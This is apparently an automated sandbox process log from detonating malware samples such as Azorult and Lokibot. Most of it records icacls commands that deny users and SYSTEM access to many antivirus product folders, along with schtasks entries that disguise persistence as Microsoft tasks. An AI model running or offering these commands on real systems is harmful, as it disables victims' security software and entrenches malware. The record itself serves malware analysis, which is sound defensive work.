C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
3⤵
PID:2964

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
4⤵
- Modifies file permissions
PID:6004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
3⤵
PID:4880

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
4⤵
- Modifies file permissions
PID:3744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
3⤵
PID:5032

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
3⤵
PID:2772

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5224

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:3524

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5432

C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
3⤵
PID:2264

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:4304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
3⤵
PID:5612

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
3⤵
PID:5608

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
3⤵
PID:5500

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
3⤵
PID:4628

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5836

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5988

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
3⤵
PID:5908

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
3⤵
PID:6024

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
3⤵
PID:2536

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
3⤵
PID:888

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
3⤵
PID:3480

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5464

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
3⤵
PID:5620

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
3⤵
PID:5612

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
3⤵
PID:5780

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
3⤵
PID:6072

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
PID:4560

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
3⤵
PID:5200

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
3⤵
PID:3928

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:6060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
3⤵
PID:6008

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:1256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
PID:5232

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
3⤵
PID:808

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
PID:5548

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
3⤵
PID:5828

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
3⤵
PID:4376

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
3⤵
PID:4308

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5924

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
3⤵
PID:4972

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
3⤵
PID:3928

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
3⤵
PID:5244

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
3⤵
PID:3060

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
3⤵
PID:5268

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
3⤵
PID:2780

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
3⤵
PID:2404

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
3⤵
PID:4596

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
3⤵
PID:5840

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5672

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5148

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4944

C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5236,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5240 /prefetch:1
2⤵
PID:5816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4924,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5680 /prefetch:8
2⤵
PID:5944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5812,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5840 /prefetch:8
2⤵
PID:768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5024,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5992 /prefetch:8
2⤵
PID:2968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5968,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6132 /prefetch:8
2⤵
PID:4336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5980,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6172 /prefetch:8
2⤵
PID:6132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6436,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5820 /prefetch:8
2⤵
PID:5612

C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3096

C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
3⤵
- Executes dropped EXE
PID:5472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1044,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4868 /prefetch:8
2⤵
- Drops file in System32 directory
PID:4288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4988,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4504 /prefetch:1
2⤵
PID:6092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5448,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5624 /prefetch:8
2⤵
PID:2088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4968,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5488 /prefetch:8
2⤵
PID:5376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5544,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5672 /prefetch:8
2⤵
PID:5260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5580,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4680 /prefetch:1
2⤵
PID:3644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5124,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5528 /prefetch:8
2⤵
PID:4412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3868,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5788 /prefetch:8
2⤵
PID:4772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5756,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6400 /prefetch:8
2⤵
PID:2276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6028,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6176 /prefetch:8
2⤵
PID:5588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6108,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5820 /prefetch:8
2⤵
PID:4616

C:\Users\Admin\Downloads\butterflyondesktop.exe
"C:\Users\Admin\Downloads\butterflyondesktop.exe"
2⤵
- Executes dropped EXE
PID:5508

C:\Users\Admin\AppData\Local\Temp\is-EO72B.tmp\butterflyondesktop.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EO72B.tmp\butterflyondesktop.tmp" /SL5="$13004A,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5656

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
4⤵
- Executes dropped EXE
PID:868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
4⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xf8,0x12c,0x7fffd3f446f8,0x7fffd3f44708,0x7fffd3f44718
5⤵
PID:5460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
5⤵
PID:2308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
5⤵
PID:760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
5⤵
PID:4440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
5⤵
PID:5532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
5⤵
PID:5584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
5⤵
PID:2732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
5⤵
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9662415434199367594,6385699011933154359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
5⤵
PID:5480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
